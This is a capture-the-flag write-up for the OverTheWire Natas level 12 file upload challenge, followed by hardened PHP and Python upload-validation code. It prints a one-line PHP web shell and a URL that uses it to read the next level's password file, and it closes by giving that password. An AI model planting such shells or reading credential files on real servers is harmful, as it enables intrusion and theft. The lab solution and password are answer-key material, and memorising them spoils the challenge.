
Natas Level 12 Writeup: File Upload Vulnerability

 

1. Objective

Find the password for natas level 13.

2. Introduction

The first thing we see is a form that gives us the ability to upload 'JPEG' images. 

 

If proper checks have not been put in place to validate the uploaded file, it is highly likely that we may have a File Upload Vulnerability. 

A File Upload Vulnerability is a security issue that arises when proper checks are not implemented to validate uploaded files. In this level, we explore the possibility of exploiting such a vulnerability.


3. Exploration

Let's use the 'View source code' button to check what clues we can find there.

Level 12 Source

The process that takes place on the server:

  • A file name is generated before the page is served to the user
  • The filename is stored in a hidden field called filename
  • When a user uploads a file, the server checks if the filename field is present
  • It prepares for the file to be saved in the upload folder
  • It checks whether the size of the file is greater than 1000 bytes
    • The file is rejected if it is greater than the limit
    • Otherwise it is saved to the uploads folder

We notice that the only check performed on the file is its size. No checks are made to ensure that only JPEG files are uploaded, so we can upload whatever file type we want, including PHP files, and the server won't block it. Also, the file name to be used is passed to the client side, which means we can modify it to ensure our file is saved as a PHP file.


4. Crafting a PHP file

We will use a simple PHP exploit:

<?php echo eval($_GET['code']); ?>

  • Enter the code above and save it in a PHP file
  • Go to the form and select the PHP file
  • Right-click on the page and select Inspect
  • Change the value of the hidden field filename to something with a PHP extension, like shell.php

 


  • Our file has been uploaded



  • Click on the link to open the PHP file

     


  • Change the URL to the following to read the file containing the password for natas13:
    http://natas12.natas.labs.overthewire.org/upload/n60np7ud5p.php?code=cat%20/etc/natas_webpass/natas13


5. Success

With this, we have gained a basic understanding of file upload vulnerabilities and how to exploit them.

Use the password that you have acquired above to access the next level.

6. Preventing file upload vulnerabilities

Checking the file size is a good place to start when preventing file upload vulnerabilities, but that alone is not enough. It is also important to ensure that the correct file type is being submitted to the server.

This can be done by:

  • Checking the extension
  • Checking the MIME type
  • Checking magic numbers

 

Here is PHP code that is potentially more secure than what we had on this level:

<?php
    // Returns true if the detected MIME type of the uploaded file is JPEG
    function isSafeMimeType($file)
    {
        $allowedMimeTypes = ['image/jpeg'];
        $finfo = finfo_open(FILEINFO_MIME_TYPE);
        $mimeType = finfo_file($finfo, $file);
        finfo_close($finfo);

        return in_array($mimeType, $allowedMimeTypes, true);
    }

    // Returns true if the first four bytes of the file match a known JPEG signature
    function isSafeMagicNumber($file)
    {
        // Magic numbers for JPEG files
        $jpegMagicNumbers = ['FFD8FFDB', 'FFD8FFE0', 'FFD8FFE1', 'FFD8FFE2']; // Add more if needed
        $fileHeader = file_get_contents($file, false, null, 0, 4); // only the header is needed
        $fileMagicNumber = strtoupper(bin2hex($fileHeader));

        return in_array($fileMagicNumber, $jpegMagicNumbers, true);
    }

    if (array_key_exists("filename", $_POST)) {
        $uploadDirectory = "upload"; // Your upload directory path

        // Make sure a file actually arrived through the HTTP POST upload mechanism
        if (!isset($_FILES['uploadedfile'])
            || $_FILES['uploadedfile']['error'] !== UPLOAD_ERR_OK
            || !is_uploaded_file($_FILES['uploadedfile']['tmp_name'])) {
            echo "No file was uploaded.";
            return;
        }

        // File Size Validation
        $maxFileSize = 1000000; // 1 MB
        if ($_FILES['uploadedfile']['size'] > $maxFileSize) {
            echo "File is too big. Maximum allowed size is 1 MB.";
            return;
        }

        // File Type Validation (MIME type)
        if (!isSafeMimeType($_FILES['uploadedfile']['tmp_name'])) {
            echo "Invalid file type. Only JPEG files are allowed.";
            return;
        }

        // Magic Number Validation
        if (!isSafeMagicNumber($_FILES['uploadedfile']['tmp_name'])) {
            echo "Invalid file content.";
            return;
        }

        // File Name Security: keep only the base name, replace anything that is not a safe
        // character, and force the extension server-side so the hidden field can never
        // turn the upload into an executable .php file
        $filename = pathinfo($_POST["filename"], PATHINFO_FILENAME);
        $filename = preg_replace("/[^A-Za-z0-9_]/", '_', $filename) . ".jpg";

        // makeRandomPathFromFilename() is the level's own helper: it picks a random name
        // inside $uploadDirectory and keeps the extension of the name passed to it
        $targetPath = makeRandomPathFromFilename($uploadDirectory, $filename);

        if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $targetPath)) {
            echo "The file <a href=\"{$targetPath}\">{$targetPath}</a> has been uploaded";
        } else {
            echo "There was an error uploading the file, please try again!";
        }
    }
?>
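As an added example (not part of the writeup, and not the level's code), here is the level's size-only logic from section 3 side by side with the hardened checks from this section, run on constructed sample bytes in Python; the function names, the random-name scheme and the extension allowlist are assumptions, and the JPEG magic numbers are the ones listed in the PHP above.

```python
import secrets

# Constructed sample uploads (not from the writeup): a minimal JPEG header padded with
# zeros, and a small PHP script that the level would happily save as shell.php.
JPEG_SAMPLE = bytes.fromhex("FFD8FFE000104A4649460001") + b"\x00" * 16
PHP_SAMPLE = b"<?php echo 'not an image'; ?>"

MAX_SIZE = 1000                      # the level's only check, in bytes
ALLOWED_EXT = {"jpg", "jpeg"}        # server-side allowlist (assumed policy)
JPEG_MAGIC = {"FFD8FFDB", "FFD8FFE0", "FFD8FFE1", "FFD8FFE2"}  # same list as the PHP above


def _extension(client_filename):
    """Lower-cased extension of the client-supplied name, or '' if it has none."""
    return client_filename.rsplit(".", 1)[-1].lower() if "." in client_filename else ""


def _random_name():
    """Server-chosen 10-character name (stand-in for the level's genRandomString)."""
    return secrets.token_hex(5)


def weak_validate(client_filename, content):
    """The level's logic: checks only the size and trusts the hidden 'filename' field,
    so the extension (and therefore whether the file executes) is attacker-controlled."""
    if len(content) > MAX_SIZE:
        return False, f"File is too big (limit {MAX_SIZE} bytes)"
    return True, f"upload/{_random_name()}.{_extension(client_filename)}"


def hardened_validate(client_filename, content):
    """Size, extension allowlist and JPEG magic number, then a server-chosen name AND
    extension. (MIME sniffing is omitted here; the PHP above uses finfo for that.)"""
    if len(content) > MAX_SIZE:
        return False, f"File is too big (limit {MAX_SIZE} bytes)"
    ext = _extension(client_filename)
    if ext not in ALLOWED_EXT:
        return False, f"Extension '{ext}' is not allowed"
    if content[:4].hex().upper() not in JPEG_MAGIC:
        return False, "Magic number does not match a JPEG file"
    # The client name was only used for the checks above; nothing from it reaches disk.
    return True, f"upload/{_random_name()}.jpg"


if __name__ == "__main__":
    cases = [("shell.php", PHP_SAMPLE), ("photo.jpg", PHP_SAMPLE), ("photo.jpg", JPEG_SAMPLE)]
    for name, data in cases:
        print(f"{name:10} weak={weak_validate(name, data)} hardened={hardened_validate(name, data)}")
```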


NthApostle

Password for natas13: lW3jYRI02ZKDBb8VtQBU1f6eDRo6WEj9


